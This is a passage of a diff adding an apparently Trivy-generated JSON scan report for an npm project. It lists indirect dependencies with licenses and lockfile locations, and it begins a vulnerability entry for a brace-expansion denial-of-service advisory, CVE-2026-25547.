"PURL": "pkg:npm/util@0.12.5", + "UID": "413359099aad5ad0" + }, + "Version": "0.12.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "inherits@2.0.4", + "is-arguments@1.2.0", + "is-generator-function@1.1.2", + "is-typed-array@1.1.15", + "which-typed-array@1.1.19" + ], + "Locations": [ + { + "StartLine": 21071, + "EndLine": 21083 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "util-deprecate@1.0.2", + "Name": "util-deprecate", + "Identifier": { + "PURL": "pkg:npm/util-deprecate@1.0.2", + "UID": "d2c6b8a9b80bcc03" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15810, + "EndLine": 15816 + }, + { + "StartLine": 21084, + "EndLine": 21089 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "utils-merge@1.0.1", + "Name": "utils-merge", + "Identifier": { + "PURL": "pkg:npm/utils-merge@1.0.1", + "UID": "8bf8bc69ead146a2" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21090, + "EndLine": 21098 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "utrie@1.0.2", + "Name": "utrie", + "Identifier": { + "PURL": "pkg:npm/utrie@1.0.2", + "UID": "c02b7dc15a51d0f7" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-arraybuffer@1.0.2" + ], + "Locations": [ + { + "StartLine": 21099, + "EndLine": 21107 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "uuid@3.4.0", + "Name": "uuid", + "Identifier": { + "PURL": "pkg:npm/uuid@3.4.0", + "UID": "7d9619cf1e452e6a" + }, + "Version": "3.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17449, + "EndLine": 17458 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "uuid@7.0.3", + "Name": "uuid", + "Identifier": { + "PURL": "pkg:npm/uuid@7.0.3", + "UID": "4c942b206312fdd9" + }, + "Version": "7.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21108, + "EndLine": 21116 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "validate-npm-package-license@3.0.4", + "Name": "validate-npm-package-license", + "Identifier": { + "PURL": "pkg:npm/validate-npm-package-license@3.0.4", + "UID": "aea52984c8673080" + }, + "Version": "3.0.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "spdx-correct@3.2.0", + "spdx-expression-parse@3.0.1" + ], + "Locations": [ + { + "StartLine": 15817, + "EndLine": 15825 + }, + { + "StartLine": 21132, + "EndLine": 21141 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "validate-npm-package-name@6.0.2", + "Name": "validate-npm-package-name", + "Identifier": { + "PURL": "pkg:npm/validate-npm-package-name@6.0.2", + "UID": "4345e13f614611d9" + }, + "Version": "6.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15835, + "EndLine": 15842 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "vary@1.1.2", + "Name": "vary", + "Identifier": { + "PURL": "pkg:npm/vary@1.1.2", + "UID": "8173cd8d197f67aa" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21142, + "EndLine": 21151 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "vlq@1.0.1", + "Name": "vlq", + "Identifier": { + "PURL": "pkg:npm/vlq@1.0.1", + "UID": "81d9e50d75fd56e2" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21152, + "EndLine": 21157 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "walk-up-path@4.0.0", + "Name": "walk-up-path", + "Identifier": { + "PURL": "pkg:npm/walk-up-path@4.0.0", + "UID": "90b801f2be31abad" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15843, + "EndLine": 15852 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "walker@1.0.8", + "Name": "walker", + "Identifier": { + "PURL": "pkg:npm/walker@1.0.8", + "UID": "58d3121c35347fff" + }, + "Version": "1.0.8", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "makeerror@1.0.12" + ], + "Locations": [ + { + "StartLine": 21158, + "EndLine": 21166 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "warn-once@0.1.1", + "Name": "warn-once", + "Identifier": { + "PURL": "pkg:npm/warn-once@0.1.1", + "UID": "c8e8a034b56952dd" + }, + "Version": "0.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21167, + "EndLine": 21172 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wcwidth@1.0.1", + "Name": "wcwidth", + "Identifier": { + "PURL": "pkg:npm/wcwidth@1.0.1", + "UID": "f0f4cbaf2f0276b7" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "defaults@1.0.4" + ], + "Locations": [ + { + "StartLine": 21173, + "EndLine": 21181 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "web-vitals@4.2.4", + "Name": "web-vitals", + "Identifier": { + "PURL": "pkg:npm/web-vitals@4.2.4", + "UID": "4dfca1a421b1559" + }, + "Version": "4.2.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21182, + "EndLine": 21187 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "websocket-driver@0.7.4", + "Name": "websocket-driver", + "Identifier": { + "PURL": "pkg:npm/websocket-driver@0.7.4", + "UID": "c6ea745149938033" + }, + "Version": "0.7.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "http-parser-js@0.5.10", + "safe-buffer@5.2.1", + "websocket-extensions@0.1.4" + ], + "Locations": [ + { + "StartLine": 21188, + "EndLine": 21201 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "websocket-extensions@0.1.4", + "Name": "websocket-extensions", + "Identifier": { + "PURL": "pkg:npm/websocket-extensions@0.1.4", + "UID": "4edf84ea0e7d3726" + }, + "Version": "0.1.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21202, + "EndLine": 21210 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "websql@2.0.3", + "Name": "websql", + "Identifier": { + "PURL": "pkg:npm/websql@2.0.3", + "UID": "7c9c9e3797de7dfb" + }, + "Version": "2.0.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "argsarray@0.0.1", + "immediate@3.3.0", + "noop-fn@1.0.0", + "sqlite3@5.1.7", + "tiny-queue@0.2.1" + ], + "Locations": [ + { + "StartLine": 21211, + "EndLine": 21225 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "whatwg-fetch@3.6.20", + "Name": "whatwg-fetch", + "Identifier": { + "PURL": "pkg:npm/whatwg-fetch@3.6.20", + "UID": "19d0578d8c0662b0" + }, + "Version": "3.6.20", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21226, + "EndLine": 21231 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "which@2.0.2", + "Name": "which", + "Identifier": { + "PURL": "pkg:npm/which@2.0.2", + "UID": "3cb8c793a23ddd82" + }, + "Version": "2.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "isexe@2.0.0" + ], + "Locations": [ + { + "StartLine": 14226, + "EndLine": 14239 + }, + { + "StartLine": 21232, + "EndLine": 21246 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "which@5.0.0", + "Name": "which", + "Identifier": { + "PURL": "pkg:npm/which@5.0.0", + "UID": "1112166a6fb4ed50" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "isexe@3.1.1" + ], + "Locations": [ + { + "StartLine": 15853, + "EndLine": 15866 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "which-module@2.0.1", + "Name": "which-module", + "Identifier": { + "PURL": "pkg:npm/which-module@2.0.1", + "UID": "187490fc6701f9e9" + }, + "Version": "2.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21314, + "EndLine": 21320 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "which-typed-array@1.1.19", + "Name": "which-typed-array", + "Identifier": { + "PURL": "pkg:npm/which-typed-array@1.1.19", + "UID": "683c065633cd1dad" + }, + "Version": "1.1.19", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "available-typed-arrays@1.0.7", + "call-bind@1.0.8", + "call-bound@1.0.4", + "for-each@0.3.5", + "get-proto@1.0.1", + "gopd@1.2.0", + "has-tostringtag@1.0.2" + ], + "Locations": [ + { + "StartLine": 21321, + "EndLine": 21341 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wide-align@1.1.5", + "Name": "wide-align", + "Identifier": { + "PURL": "pkg:npm/wide-align@1.1.5", + "UID": "27a0eb9c97bd817c" + }, + "Version": "1.1.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3" + ], + "Locations": [ + { + "StartLine": 21342, + "EndLine": 21350 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wrap-ansi@6.2.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@6.2.0", + "UID": "78c5306ab439108e" + }, + "Version": "6.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@4.3.0", + "string-width@4.2.3", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 12003, + "EndLine": 12017 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wrap-ansi@7.0.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@7.0.0", + "UID": "9206818c7cc6ce85" + }, + "Version": "7.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@4.3.0", + "string-width@4.2.3", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 15885, + "EndLine": 15903 + }, + { + "StartLine": 21361, + "EndLine": 21377 + }, + { + "StartLine": 21378, + "EndLine": 21395 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wrap-ansi@8.1.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@8.1.0", + "UID": "58a8b6f3c08660dd" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@6.2.3", + "string-width@5.1.2", + "strip-ansi@7.1.2" + ], + "Locations": [ + { + "StartLine": 3390, + "EndLine": 3406 + }, + { + "StartLine": 15867, + "EndLine": 15884 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wrappy@1.0.2", + "Name": "wrappy", + "Identifier": { + "PURL": "pkg:npm/wrappy@1.0.2", + "UID": "d2a2030c3e6a233c" + }, + "Version": "1.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21396, + "EndLine": 21401 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "write-file-atomic@4.0.2", + "Name": "write-file-atomic", + "Identifier": { + "PURL": "pkg:npm/write-file-atomic@4.0.2", + "UID": "c325b9bcd37cbb2e" + }, + "Version": "4.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "imurmurhash@0.1.4", + "signal-exit@3.0.7" + ], + "Locations": [ + { + "StartLine": 21402, + "EndLine": 21414 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "write-file-atomic@6.0.0", + "Name": "write-file-atomic", + "Identifier": { + "PURL": "pkg:npm/write-file-atomic@6.0.0", + "UID": "9a4d7dd4aaf747cb" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "imurmurhash@0.1.4", + "signal-exit@4.1.0" + ], + "Locations": [ + { + "StartLine": 15970, + "EndLine": 15981 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ws@6.2.3", + "Name": "ws", + "Identifier": { + "PURL": "pkg:npm/ws@6.2.3", + "UID": "7197e85279f59780" + }, + "Version": "6.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "async-limiter@1.0.1" + ], + "Locations": [ + { + "StartLine": 21415, + "EndLine": 21423 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ws@7.5.10", + "Name": "ws", + "Identifier": { + "PURL": "pkg:npm/ws@7.5.10", + "UID": "4026c8326f0d9d85" + }, + "Version": "7.5.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12722, + "EndLine": 12742 + }, + { + "StartLine": 17186, + "EndLine": 17206 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "x-path@0.0.2", + "Name": "x-path", + "Identifier": { + "PURL": "pkg:npm/x-path@0.0.2", + "UID": "99d92e4870dc0df5" + }, + "Version": "0.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "path-extra@1.0.3" + ], + "Locations": [ + { + "StartLine": 21424, + "EndLine": 21432 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xcode@2.1.0", + "Name": "xcode", + "Identifier": { + "PURL": "pkg:npm/xcode@2.1.0", + "UID": "c60c39ac6bb2e487" + }, + "Version": "2.1.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "simple-plist@1.3.1", + "uuid@3.4.0" + ], + "Locations": [ + { + "StartLine": 17459, + "EndLine": 17471 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xcode@3.0.1", + "Name": "xcode", + "Identifier": { + "PURL": "pkg:npm/xcode@3.0.1", + "UID": "f3daf23ade4d3136" + }, + "Version": "3.0.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "simple-plist@1.3.1", + "uuid@7.0.3" + ], + "Locations": [ + { + "StartLine": 21433, + "EndLine": 21445 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xml-formatter@3.6.7", + "Name": "xml-formatter", + "Identifier": { + "PURL": "pkg:npm/xml-formatter@3.6.7", + "UID": "8b604ae27eb0421b" + }, + "Version": "3.6.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "xml-parser-xo@4.1.5" + ], + "Locations": [ + { + "StartLine": 21446, + "EndLine": 21457 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xml-parser-xo@4.1.5", + "Name": "xml-parser-xo", + "Identifier": { + "PURL": "pkg:npm/xml-parser-xo@4.1.5", + "UID": "40475f5fc6e532d8" + }, + "Version": "4.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21458, + "EndLine": 21466 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xml2js@0.6.0", + "Name": "xml2js", + "Identifier": { + "PURL": "pkg:npm/xml2js@0.6.0", + "UID": "5b7968e8f0515a62" + }, + "Version": "0.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "sax@1.4.1", + "xmlbuilder@11.0.1" + ], + "Locations": [ + { + "StartLine": 21467, + "EndLine": 21479 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xmlbuilder@11.0.1", + "Name": "xmlbuilder", + "Identifier": { + "PURL": "pkg:npm/xmlbuilder@11.0.1", + "UID": "bc3fe4c2648ced2c" + }, + "Version": "11.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21480, + "EndLine": 21488 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xmlbuilder@15.1.1", + "Name": "xmlbuilder", + "Identifier": { + "PURL": "pkg:npm/xmlbuilder@15.1.1", + "UID": "3cc55ec1c254330a" + }, + "Version": "15.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21489, + "EndLine": 21497 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "y18n@4.0.3", + "Name": "y18n", + "Identifier": { + "PURL": "pkg:npm/y18n@4.0.3", + "UID": "449b6aa4fdad1b10" + }, + "Version": "4.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12018, + "EndLine": 12024 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "y18n@5.0.8", + "Name": "y18n", + "Identifier": { + "PURL": "pkg:npm/y18n@5.0.8", + "UID": "25531c7b6dc3d940" + }, + "Version": "5.0.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21498, + "EndLine": 21506 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yallist@3.1.1", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@3.1.1", + "UID": "25dabec4c7b9387d" + }, + "Version": "3.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21507, + "EndLine": 21512 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yallist@4.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@4.0.0", + "UID": "4e5463d284ce43d2" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6878, + "EndLine": 6884 + }, + { + "StartLine": 9528, + "EndLine": 9534 + }, + { + "StartLine": 10036, + "EndLine": 10041 + }, + { + "StartLine": 12214, + "EndLine": 12220 + }, + { + "StartLine": 12904, + "EndLine": 12910 + }, + { + "StartLine": 12942, + "EndLine": 12948 + }, + { + "StartLine": 12975, + "EndLine": 12981 + }, + { + "StartLine": 13008, + "EndLine": 13014 + }, + { + "StartLine": 13041, + "EndLine": 13047 + }, + { + "StartLine": 13075, + "EndLine": 13081 + }, + { + "StartLine": 15982, + "EndLine": 15988 + }, + { + "StartLine": 19960, + "EndLine": 19966 + }, + { + "StartLine": 20514, + "EndLine": 20520 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yallist@5.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@5.0.0", + "UID": "47cb8de25b79f357" + }, + "Version": "5.0.0", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15697, + "EndLine": 15704 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yaml@2.8.1", + "Name": "yaml", + "Identifier": { + "PURL": "pkg:npm/yaml@2.8.1", + "UID": "37f4ea3e7440d092" + }, + "Version": "2.8.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21513, + "EndLine": 21524 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs@15.4.1", + "Name": "yargs", + "Identifier": { + "PURL": "pkg:npm/yargs@15.4.1", + "UID": "7ab750adb3eb2f6e" + }, + "Version": "15.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cliui@6.0.0", + "decamelize@1.2.0", + "find-up@4.1.0", + "get-caller-file@2.0.5", + "require-directory@2.1.1", + "require-main-filename@2.0.0", + "set-blocking@2.0.0", + "string-width@4.2.3", + "which-module@2.0.1", + "y18n@4.0.3", + "yargs-parser@18.1.3" + ], + "Locations": [ + { + "StartLine": 12025, + "EndLine": 12047 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs@16.2.0", + "Name": "yargs", + "Identifier": { + "PURL": "pkg:npm/yargs@16.2.0", + "UID": "7a1f8ab1d0ad7cc0" + }, + "Version": "16.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cliui@7.0.4", + "escalade@3.2.0", + "get-caller-file@2.0.5", + "require-directory@2.1.1", + "string-width@4.2.3", + "y18n@5.0.8", + "yargs-parser@20.2.9" + ], + "Locations": [ + { + "StartLine": 18506, + "EndLine": 18523 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs@17.7.2", + "Name": "yargs", + "Identifier": { + "PURL": "pkg:npm/yargs@17.7.2", + "UID": "f228b296bb34999" + }, + "Version": "17.7.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cliui@8.0.1", + "escalade@3.2.0", + "get-caller-file@2.0.5", + "require-directory@2.1.1", + "string-width@4.2.3", + "y18n@5.0.8", + "yargs-parser@21.1.1" + ], + "Locations": [ + { + "StartLine": 21525, + "EndLine": 21542 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs-parser@18.1.3", + "Name": "yargs-parser", + "Identifier": { + "PURL": "pkg:npm/yargs-parser@18.1.3", + "UID": "7f41f342fea7a5f3" + }, + "Version": "18.1.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "camelcase@5.3.1", + "decamelize@1.2.0" + ], + "Locations": [ + { + "StartLine": 12048, + "EndLine": 12061 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs-parser@20.2.9", + "Name": "yargs-parser", + "Identifier": { + "PURL": "pkg:npm/yargs-parser@20.2.9", + "UID": "904791dd3365191f" + }, + "Version": "20.2.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12354, + "EndLine": 12362 + }, + { + "StartLine": 18524, + "EndLine": 18532 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs-parser@21.1.1", + "Name": "yargs-parser", + "Identifier": { + "PURL": "pkg:npm/yargs-parser@21.1.1", + "UID": "a8317e8b6e326666" + }, + "Version": "21.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21543, + "EndLine": 21551 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yocto-queue@0.1.0", + "Name": "yocto-queue", + "Identifier": { + "PURL": "pkg:npm/yocto-queue@0.1.0", + "UID": "abf88c15000a0365" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21552, + "EndLine": 21563 + } + ], + "AnalyzedBy": "npm" + } + ], + "Vulnerabilities": [ + { + "VulnerabilityID": "CVE-2026-25547", + "VendorIDs": [ + "GHSA-7h2j-956f-4vf2" + ], + "PkgID": "@isaacs/brace-expansion@5.0.0", + "PkgName": "@isaacs/brace-expansion", + "PkgIdentifier": { + "PURL": "pkg:npm/%40isaacs/brace-expansion@5.0.0", + "UID": "8e954b8711d9795" + }, + "InstalledVersion": "5.0.0", + "FixedVersion": "5.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25547", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:14511cca8a4cba6240f34ccda2eb1a2ee09e35603ce69ca1223172fd6a0b99e1", + "Title": "brace-expansion: brace-expansion: Denial of Service via unbounded brace range expansion", + "Description": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7350", + "https://access.redhat.com/security/cve/CVE-2026-25547", + "https://bugzilla.redhat.com/2431340", + "https://bugzilla.redhat.com/2436942", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2447140", + "https://bugzilla.redhat.com/2447141", + "https://bugzilla.redhat.com/2447142", + "https://bugzilla.redhat.com/2447143", + "https://bugzilla.redhat.com/2447144", + "https://bugzilla.redhat.com/2447145", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453037", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/2453152", + "https://bugzilla.redhat.com/2453157", + "https://bugzilla.redhat.com/2453158", + "https://bugzilla.redhat.com/2453160", + "https://bugzilla.redhat.com/2453161", + "https://bugzilla.redhat.com/2453162", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431340", + "https://bugzilla.redhat.com/show_bug.cgi?id=2436942", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447140", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447141", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447142", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447143", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447144", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447145", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453037", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453152", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453157", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453158", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453160", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453161", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453162", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1525", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1527", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1528", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21711", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21712", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21713", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21714", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21715", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21716", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21717", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2229", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25547", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2581", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://errata.almalinux.org/9/ALSA-2026-7350.html", + "https://errata.rockylinux.org/RLSA-2026:7350", + "https://github.com/isaacs/brace-expansion", + "https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2", + "https://linux.oracle.com/cve/CVE-2026-25547.html", + "https://linux.oracle.com/errata/ELSA-2026-7675.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-25547", + "https://www.cve.org/CVERecord?id=CVE-2026-25547" + ], + "PublishedDate": "2026-02-04T22:16:00.813Z", + 